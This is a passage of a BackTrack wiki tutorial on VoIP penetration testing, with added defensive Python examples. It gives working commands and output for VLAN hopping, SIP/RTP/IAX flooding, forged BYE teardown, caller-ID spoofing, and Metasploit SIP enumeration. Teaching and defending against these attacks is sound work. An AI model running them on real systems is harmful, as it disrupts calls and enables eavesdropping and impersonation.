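    (ethertype,) = struct.unpack("!H", frame[12:14])
    vlan = None
    if ethertype == TPID_8021Q:
        if len(frame) < 18:
            raise ValueError("truncated 802.1Q header")
        tci, ethertype = struct.unpack("!HH", frame[14:18])
        vlan = tci & 0x0FFF                   # low 12 bits carry the VLAN ID
    return dst, src, vlan, ethertype


def audit_voice_vlan(frames, phone_macs, voice_vlan=VOICE_VLAN):
    """Source MACs tagged with the voice VLAN that are not known phones.
    A PC that hopped into VLAN 20 lands here; so does a phone that was
    installed without updating the inventory, the false positive an
    operator has to reconcile."""
    suspicious = set()
    for frame in frames:
        _, src, vlan, _ = parse_frame(frame)
        if vlan == voice_vlan and src not in phone_macs:
            suspicious.add(src)
    return suspicious


PHONES = {"00:1e:f7:28:9c:8e"}            # inventory of phone MACs (constructed)
PC_MAC = "00:0c:29:84:98:b2"              # a workstation NIC (constructed)
BCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE = [
    build_frame(BCAST, "00:1e:f7:28:9c:8e", VOICE_VLAN),   # phone on VLAN 20: expected
    build_frame(BCAST, PC_MAC, DATA_VLAN),                 # PC on VLAN 10: expected
    build_frame(BCAST, PC_MAC, VOICE_VLAN),                # PC tagged 20: flag it
    build_frame(BCAST, PC_MAC, None),                      # untagged: not relevant
]

if __name__ == "__main__":
    print("unexpected sources on the voice VLAN:", audit_voice_vlan(SAMPLE, PHONES))
```

The same parser works on frames read from a tap or SPAN port of the access switch. A hopper that also spoofs the phone's MAC (a feature VoIP Hopper lists below) will not show up in this audit, so it complements rather than replaces port security and 802.1X on the access ports.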

VoIP Hopper

VoIP Hopper is used to hop into the voice VLAN by behaving like an IP phone; it supports specific switches and some phone models. It currently supports brands like Cisco, Avaya and Nortel. VoIP Hopper was designed to run under Backtrack and currently has the following features: DHCP Client, CDP Generator, MAC Address Spoofing and VLAN hopping. VoIP Hopper usage:

root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
  Example: voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
  -D (Device ID)
  -P (Port ID)
  -C (Capabilities)
  -L (Platform)
  -S (Software)
  -U (Duplex)
  Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
  Example: voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
  Example: voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
  Example: voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
  Example: voiphopper -i eth0 -n

VoIP Hopper provides many modes for attack; please use -h for detailed information.

Let's take a look at an example of sniffing for CDP and running a VLAN Hop into the Voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface in the following way:

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -c 0


VoIP Hopper also allows one to VLAN Hop to an arbitrary VLAN, without sniffing for CDP. If you already know the Voice VLAN ID or would like to VLAN Hop into another VLAN, just specify the VLAN ID.

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 20
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20
eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)

ACE

ACE is another tool for VLAN hopping, very similar to VoIP Hopper in usage, and it includes an option to also discover TFTP servers (configuration servers). ACE Usage:

root@bt:/pentest/voip/ace# ./ace
ACE v1.0: Automated Corporate (Data) Enumerator
Usage: ace [-i interface] [-m mac address] [-t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode]
-i <interface> (Mandatory) Interface for sniffing/sending packets
-m <mac address> (Mandatory) MAC address of the victim IP phone
-t <tftp server ip> (Optional) tftp server ip address
-c <cdp mode 0|1> (Optional) 0 CDP sniff mode, 1 CDP spoof mode
-v <voice vlan id> (Optional) Enter the voice vlan ID
-r <vlan interface> (Optional) Removes the VLAN interface
-d (Optional) Verbose | debug mode

You can manually add a VLAN hop or use its discovery feature:
Mode to specify the Voice VLAN ID
  Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E
Mode to auto-discover the voice VLAN ID in the listening mode for CDP
  Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E
Mode to auto-discover the voice VLAN ID in the spoofing mode for CDP
  Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E

TIP: To view your MAC address in backtrack use:
root@bt:~# macchanger -s eth0


It doesn't matter if you used VoIP Hopper or ACE; you can now intercept VoIP traffic with tools like ucsniff by specifying the newly created interface.
For example:

root@bt:/pentest/voip/ucsniff# ucsniff -i eth0.20 // //

Denial Of Service

A denial of service attack on VoIP services can render them useless by causing intentional damage to the availability of the network and VoIP systems. This attack can occur on two levels: standard network DoS attacks and VoIP specific DoS attacks. Generally the attacker will send tons of data, flooding the network to consume all its resources, or flood a specific protocol in order to overwhelm it with requests. Let's take a quick overview of the tools available in Backtrack.

Inviteflood

This tool can be used to flood a target with INVITE requests; it can be used to target SIP gateways/proxies and SIP phones.

root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
  interface (e.g. eth0)
  target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
  target domain (e.g. enterprise.com or an IPv4 address)
  IPv4 addr of flood target (ddd.ddd.ddd.ddd)
  flood stage (i.e. number of packets)
Optional -
  -a flood tool "From:" alias (e.g. jane.doe)
  -i IPv4 source IP address [default is IP address of interface]
  -S srcPort (0 - 65535) [default is well-known discard port 9]
  -D destPort (0 - 65535) [default is well-known SIP port 5060]
  -l lineString line used by SNOM [default is blank]
  -s sleep time btwn INVITE msgs (usec)
  -h help - print this usage
  -v verbose output mode

A basic usage syntax looks like this:
./inviteflood eth0 target_extension target_domain target_ip number_of_packets


As long as the tool keeps flooding the SIP gateway it will prevent users from making phone calls. You can also flood the SIP proxy with an inexistent extension, thus making it generate a 404 Not Found for every request, just to keep it busy.
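Detection for the flood just described, from the PBX operator's side, as an added Python example (not from the original article or from inviteflood). It works over a constructed, simplified signalling log (one line per request: ISO time, source IP, method, target extension, final response code), reports every source whose INVITE count inside a sliding window reaches a threshold, and records what share of those INVITEs ended in 404, which is the inexistent-extension pattern the text mentions. The log format, the thresholds and the sample traffic are assumptions made for the example.

```python
"""Rate-based detection of INVITE floods over a signalling log.

Added example; not from the original article or from inviteflood.  Works on
a constructed, simplified log (one line per request: ISO time, source IP,
method, target extension, final response code) and reports sources whose
INVITE count inside a sliding window reaches a threshold, together with the
share of those INVITEs that ended in 404 (the inexistent-extension pattern).
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW_SECONDS = 10
MAX_INVITES_PER_WINDOW = 50      # tune to the PBX's normal call setup rate


def parse_line(line):
    ts, src, method, ext, code = line.split()
    return datetime.fromisoformat(ts), src, method, ext, int(code)


def detect_invite_floods(lines, window=WINDOW_SECONDS, threshold=MAX_INVITES_PER_WINDOW):
    """Return {src: (peak INVITEs in any window, share answered 404)} for
    every source whose peak reached the threshold."""
    recent = defaultdict(deque)          # src -> timestamps inside the window
    peak, total, not_found = {}, defaultdict(int), defaultdict(int)
    for line in sorted(lines, key=lambda l: parse_line(l)[0]):
        ts, src, method, _, code = parse_line(line)
        if method != "INVITE":
            continue
        total[src] += 1
        if code == 404:
            not_found[src] += 1
        q = recent[src]
        q.append(ts)
        while (ts - q[0]) > timedelta(seconds=window):   # drop what left the window
            q.popleft()
        peak[src] = max(peak.get(src, 0), len(q))
    return {src: (n, round(not_found[src] / total[src], 2))
            for src, n in peak.items() if n >= threshold}


def constructed_log():
    """Five legitimate calls spread over a minute, plus 120 INVITEs in six
    seconds from one source, all aimed at an extension that does not exist."""
    base = datetime(2011, 2, 1, 17, 55, 0)
    lines = [f"{(base + timedelta(seconds=12 * i)).isoformat()} 192.168.1.118 INVITE 201 200"
             for i in range(5)]
    lines += [f"{(base + timedelta(milliseconds=50 * i)).isoformat()} 192.168.1.105 INVITE 9999 404"
              for i in range(120)]
    return lines


if __name__ == "__main__":
    for src, (n, share404) in detect_invite_floods(constructed_log()).items():
        print(f"{src}: {n} INVITEs within {WINDOW_SECONDS}s, {share404:.0%} to unknown extensions")
```

The 404 share separates a burst of real call attempts (say, a call centre opening) from a flood aimed at nothing; a source that trips the rate threshold with nearly all requests unanswered is a candidate for rate limiting at the SIP proxy or a block at the border.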

Rtpflood

Rtpflood is used to flood a target IP phone with UDP packets containing RTP data. In order to launch a successful attack using rtpflood you will need to know the RTP listening port on the remote device you want to attack; for example, the X-Lite softphone RTP port is 8000.

root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.

root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Teardown
Teardown is used to terminate a call by sending a BYE request:

./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid SIP OK response and use its From and To tags and a valid Call-ID value.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200";tag=hcykd
To: "200";tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0

If you specify the -v option you can see the payload:

SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Spoofing Caller ID

There are several methods for spoofing Caller ID which we won't discuss here because they require a different set of tools and equipment which are irrelevant to this article's purpose. Spoofing Caller ID in SIP is fairly easy: you just need to change the From header of the INVITE request.

INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>

We will take a look at a tool we have already discussed called Inviteflood, which can be used to send spoofed INVITE requests:
root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"
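The forged BYE from the Teardown section and the altered From header above, examined from the receiving side, as an added Python example (not code from the original article, from teardown or from inviteflood). A small SIP header parser learns a dialog from a 200 OK and then scores a later BYE for the signs visible in the page's own payload dump: a Call-ID and tags that match a real dialog but a CSeq far outside its sequence, a Via branch without the RFC 3261 "z9hG4bK" cookie, a Via sent-by on the discard port 9, and a From URI that is not a party to the dialog. A second check compares an INVITE's From header against a table of registered identities. All messages are constructed for the example, modelled on the page's output; the REGISTERED table (address-of-record to display name) is an assumption.

```python
# Added example, not from the article or the teardown/inviteflood tools. A
# small SIP header parser learns a dialog from a 200 OK and then scores a
# later BYE, and an INVITE's From header, for the signs visible in the forged
# messages on this page. Messages are constructed, modelled on the page's
# output; the REGISTERED table (AoR -> display name) is an assumption.
import re

MAGIC_COOKIE = "z9hG4bK"   # RFC 3261 branch prefix every compliant UA emits

def parse_sip(raw):
    lines = raw.strip("\r\n").replace("\r\n", "\n").split("\n")
    headers = {}                               # lower-cased name -> [values]
    for line in lines[1:]:
        if not line.strip():
            break                              # blank line ends the headers
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def tag_of(v):
    m = re.search(r";tag=([^;\s]+)", v)
    return m.group(1) if m else None
def uri_of(v):
    m = re.search(r"<([^>]+)>", v) or re.search(r"(sip:[^;\s]+)", v)
    return m.group(1) if m else None
def via_sent_by(h):
    """(host[:port], branch) from the topmost Via."""
    via = h["via"][0]
    host = re.match(r"SIP/2\.0/\w+\s+([^;\s]+)", via)
    branch = re.search(r";branch=([^;\s]+)", via)
    return (host.group(1) if host else None), (branch.group(1) if branch else None)

def learn_dialog(table, raw_200_ok):
    """Record a confirmed dialog: both tags, both parties, last CSeq."""
    _, h = parse_sip(raw_200_ok)
    table[h["call-id"][0]] = {
        "tags": {tag_of(h["from"][0]), tag_of(h["to"][0])},
        "parties": {uri_of(h["from"][0]), uri_of(h["to"][0])},
        "last_cseq": int(h["cseq"][0].split()[0])}
    return table

def check_bye(table, raw_bye, max_cseq_jump=1000):
    """Anomalies for a BYE; an empty list means it looks legitimate."""
    _, h = parse_sip(raw_bye)
    dlg = table.get(h["call-id"][0])
    if dlg is None:
        return ["BYE for unknown Call-ID"]
    findings = []
    if {tag_of(h["from"][0]), tag_of(h["to"][0])} != dlg["tags"]:
        findings.append("dialog tags do not match")
    cseq = int(h["cseq"][0].split()[0])
    if cseq - dlg["last_cseq"] > max_cseq_jump:
        findings.append(f"CSeq jumped from {dlg['last_cseq']} to {cseq}")
    if uri_of(h["from"][0]) not in dlg["parties"]:
        findings.append("From URI is not a party to the dialog")
    sent_by, branch = via_sent_by(h)
    if not branch or not branch.startswith(MAGIC_COOKIE):
        findings.append("Via branch lacks the z9hG4bK cookie")
    if sent_by and sent_by.endswith(":9"):
        findings.append("Via sent-by is the discard port 9")
    return findings

def check_invite_from(raw_invite, registered):
    _, h = parse_sip(raw_invite)
    frm = h["from"][0]
    uri = uri_of(frm)
    m = re.match(r'\s*"([^"]*)"', frm)         # quoted display name, if any
    display = m.group(1) if m else ""
    if uri not in registered:
        return [f"From URI {uri} is not registered"]
    if registered[uri] != display:
        return [f"display name {display!r} differs from registered {registered[uri]!r}"]
    return []

OK_200 = """SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;rport=5060
From: "200" <sip:200@192.168.1.104>;tag=hcykd
To: "201" <sip:201@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 INVITE
"""
FORGED_BYE = """BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
"""
NORMAL_BYE = """BYE sip:201@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:5060;branch=z9hG4bKabc123
From: "200" <sip:200@192.168.1.104>;tag=hcykd
To: "201" <sip:201@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 135 BYE
"""
SPOOFED_INVITE = """INVITE sip:201@192.168.1.104 SIP/2.0
From: "Evil Hacker" <sip:200@192.168.1.104>;tag=xyz
To: <sip:201@192.168.1.104>
"""
REGISTERED = {"sip:200@192.168.1.104": "200", "sip:201@192.168.1.104": "201"}
```

The display-name comparison is deliberately strict: a proxy that enforces the registered identity on outbound INVITEs (or rewrites the From header from the authenticated account) is what keeps a client-side edit like the one above from reaching the called phone, and the BYE checks are the kind of rule a SIP-aware firewall or session border controller applies before forwarding a teardown it did not see originate from a dialog party.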

Attacking VoIP Using Metasploit

The Metasploit framework includes several auxiliaries and modules dedicated to VoIP exploitation. You can find them by using the search function with keywords such as sip or voip. Let's launch msfconsole and perform a search for available modules:

root@bt:~# msfconsole
msf > search sip

Metasploit VoIP Modules
Here's a complete list of the available modules for your reference:
Auxiliaries

scanner/sip/enumerator      SIP Username Enumerator (UDP)
scanner/sip/enumerator_tcp  SIP Username Enumerator (TCP)
scanner/sip/options         SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp     SIP Endpoint Scanner (TCP)
voip/sip_invite_spoof       SIP Invite Spoof

Exploits

windows/sip/aim_triton_cseq     AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq    SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq      SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
unix/webapp/trixbox_langchoice  Trixbox langChoice PHP Local File Inclusion

Scanning SIP Enabled Devices


Metasploit provides a SIP scanner auxiliary which comes in two flavors, TCP and UDP; we can use it to discover SIP enabled devices using the OPTIONS method. Let's see an example of the UDP version, the scanner/sip/options auxiliary. Auxiliary options are:

msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options
Module options (auxiliary/scanner/sip/options):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host
msf auxiliary(options) > set RHOSTS 192.168.1.130/24
RHOSTS => 192.168.1.130/24
msf auxiliary(options) > run
[*] 192.168.1.20 200 agent='Grandstream HT502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.21 200 agent='Grandstream HT502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.22 200 agent='Grandstream HT502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.92 200 agent='Grandstream HT502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.140 200 agent='Grandstream HT502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Enumerating SIP extensions/Usernames

The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts. It supports two methods of discovery, OPTIONS and REGISTER, and it also comes in two flavors, TCP and UDP. Auxiliary options:

msf > use scanner/sip/enumerator
msf auxiliary(enumerator) > show options
Module options (auxiliary/scanner/sip/enumerator):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   MAXEXT     9999             yes       Ending extension
   METHOD     REGISTER         yes       Enumeration method to use OPTIONS/REGISTER
   MINEXT     0                yes       Starting extension
   PADLEN     4                yes       Cero padding maximum length
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads

Example Usage:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(enumerator) > set MINEXT 100
MINEXT => 100
msf auxiliary(enumerator) > set MAXEXT 500
MAXEXT => 500
msf auxiliary(enumerator) > set PADLEN 3
PADLEN => 3
msf auxiliary(enumerator) > run
[*] Found user: 200 <sip:200@192.168.1.104> [Auth]
[*] Found user: 201 <sip:201@192.168.1.104> [Auth]
[*] Found user: 202 <sip:202@192.168.1.104> [Auth]
[*] Found user: 203 <sip:203@192.168.1.104> [Auth]
[*] Found user: 204 <sip:204@192.168.1.104> [Auth]
[*] Found user: 300 <sip:300@192.168.1.104> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Spoofing Caller ID auxiliary


The voip/sip_invite_spoof auxiliary will create a fake SIP INVITE request, making the targeted device ring and display fake caller ID information. Auxiliary Options:

msf > use voip/sip_invite_spoof
msf auxiliary(sip_invite_spoof) > show options
Module options (auxiliary/voip/sip_invite_spoof):
   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   MSG      The Metasploit has you  yes       The spoofed caller id to send
   RHOSTS                           yes       The target address range or CIDR identifier
   RPORT    5060                    yes       The target port
   SRCADDR  192.168.1.1             yes       The sip address the spoofed call is coming from
   THREADS  1                       yes       The number of concurrent threads

Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting VoIP systems
Metasploit includes several exploits for SIP client software and even for the Trixbox PBX web management interface. Although this is not a SIP specific vulnerability, it is still related and can give an attacker full control of a PBX.

Closing Words

I hope you've found this document informative. Please keep in mind that Backtrack Linux provides many tools and features I haven't covered here. Take the time to browse the tools, read the manuals and READMEs, and I am sure you'll find the right tool for the job.

Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums; we would love to hear your feedback and experiences.
http://www.backtrack-linux.org/forums/

About The Author

Shai Rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel. He holds the Offensive Security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il

References
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
Retrieved from "http://www.backtrack-linux.org/wiki/index.php?title=Pentesting_VOIP&oldid=789"
This page was last modified on 12 June 2011, at 19:16.
